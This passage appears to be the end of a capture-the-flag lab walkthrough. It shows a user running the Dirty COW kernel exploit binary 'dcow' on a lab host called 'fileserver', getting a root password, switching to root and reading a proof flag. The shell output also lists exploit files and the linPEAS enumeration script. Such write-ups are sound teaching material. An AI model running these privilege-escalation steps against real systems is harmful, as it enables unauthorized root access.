40611  40611.c  40847.cpp  dcow  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./dcow
Running ...
Received su prompt (密码:)
Root password is:   dirtyCowFun
Enjoy! :-)

The exploit succeeded and produced the root password dirtyCowFun; switch straight to root.

[smbuser@fileserver tmp]$ su
密码:
[root@fileserver tmp]# whoami
root

Getting the flag

[root@fileserver tmp]# whoami
root

[root@fileserver tmp]# uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

[root@fileserver tmp]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1440sec preferred_lft 1440sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever

[root@fileserver tmp]# ls /root
proof.txt
[root@fileserver tmp]# cat proof.txt
cat: proof.txt: 没有那个文件或目录
[root@fileserver tmp]# cat /root/proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43
